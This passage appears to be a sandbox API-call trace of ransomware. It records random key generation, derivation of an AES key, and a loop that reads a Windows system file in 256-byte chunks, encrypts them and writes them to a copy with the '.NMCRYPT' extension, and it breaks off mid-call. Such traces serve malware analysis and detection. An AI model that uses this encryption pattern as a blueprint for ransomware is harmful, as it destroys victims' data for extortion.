[0161.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.215] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.215] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0161.215] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0161.216] CryptCreateHash (in: hProv=0x8e3a18, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444734 | out: phHash=0x1d444734) returned 1 [0161.216] CryptHashData (hHash=0x9ad138, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0161.216] CryptDeriveKey (in: hProv=0x8e3a18, Algid=0x6610, hBaseData=0x9ad138, dwFlags=0x4, phKey=0x1d444738 | out: phKey=0x1d444738*=0x9ad7f8) returned 1 [0161.216] CryptSetKeyParam (hKey=0x9ad7f8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0161.216] CryptSetKeyParam (hKey=0x9ad7f8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0161.216] wcslen (_String="\\\\?\\") returned 0x4 [0161.216] CryptDuplicateKey (in: hKey=0x9ad7f8, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e174 | out: phKey=0x2d7e174*=0x9ad178) returned 1 [0161.216] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-CN\\tipresx.dll.mui.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\zh-cn\\tipresx.dll.mui.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0161.216] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-CN\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\zh-cn\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0161.216] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7e164 | out: lpFileSize=0x2d7e164*=6656) returned 1 [0161.216] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e15c*=0x200, lpOverlapped=0x0) returned 1 [0161.217] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.218] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.218] GetLastError () returned 0x0 [0161.218] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.219] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.219] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.219] GetLastError () returned 0x0 [0161.219] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.219] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.220] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.220] GetLastError () returned 0x0 [0161.220] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.220] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.220] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.220] GetLastError () returned 0x0 [0161.220] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.220] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.220] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.220] GetLastError () returned 0x0 [0161.220] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.220] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.220] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.220] GetLastError () returned 0x0 [0161.220] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.220] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.220] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.220] GetLastError () returned 0x0 [0161.220] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.220] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.220] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.220] GetLastError () returned 0x0 [0161.220] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.220] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.220] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.220] GetLastError () returned 0x0 [0161.220] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.221] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.221] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.221] GetLastError () returned 0x0 [0161.221] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.221] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.221] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.221] GetLastError () returned 0x0 [0161.221] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.221] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.221] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.221] GetLastError () returned 0x0 [0161.221] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.221] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.221] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.221] GetLastError () returned 0x0 [0161.221] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.221] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.221] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.221] GetLastError () returned 0x0 [0161.221] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.221] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.221] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.222] GetLastError () returned 0x0 [0161.222] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.222] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.222] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.222] GetLastError () returned 0x0 [0161.222] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.222] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.222] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.222] GetLastError () returned 0x0 [0161.222] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.222] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.222] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.222] GetLastError () returned 0x0 [0161.222] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.222] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.222] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.222] GetLastError () returned 0x0 [0161.222] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.222] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.222] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.222] GetLastError () returned 0x0 [0161.222] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.222] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.222] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.223] GetLastError () returned 0x0 [0161.223] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.223] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.223] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.223] GetLastError () returned 0x0 [0161.223] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.223] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.223] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.223] GetLastError () returned 0x0 [0161.223] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.223] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.223] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.223] GetLastError () returned 0x0 [0161.223] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, 